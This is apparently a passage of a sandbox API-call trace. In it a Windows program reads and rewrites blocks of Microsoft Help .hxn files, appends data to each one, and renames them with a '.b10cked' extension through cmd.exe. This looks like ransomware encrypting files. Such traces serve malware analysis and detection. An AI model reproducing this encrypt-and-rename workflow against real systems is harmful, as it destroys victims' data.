SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.574] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.575] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.575] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.575] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_PRM.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.581] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.581] CloseHandle (hObject=0x120) returned 1 [0199.582] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN") returned 0x27 [0199.582] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.583] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xdb0, dwThreadId=0x91c)) returned 1 [0199.590] CloseHandle (hObject=0x1b4) returned 1 [0199.590] CloseHandle (hObject=0x120) returned 1 [0199.590] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.590] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25638004366) returned 1 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.593] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.594] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.594] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.594] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.595] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.595] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.595] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_STD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.600] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.600] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.600] CloseHandle (hObject=0x120) returned 1 [0199.601] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN") returned 0x27 [0199.602] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.602] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x92c, dwThreadId=0xdb8)) returned 1 [0199.638] CloseHandle (hObject=0x1b4) returned 1 [0199.638] CloseHandle (hObject=0x120) returned 1 [0199.638] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.638] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.638] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25642797928) returned 1 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, 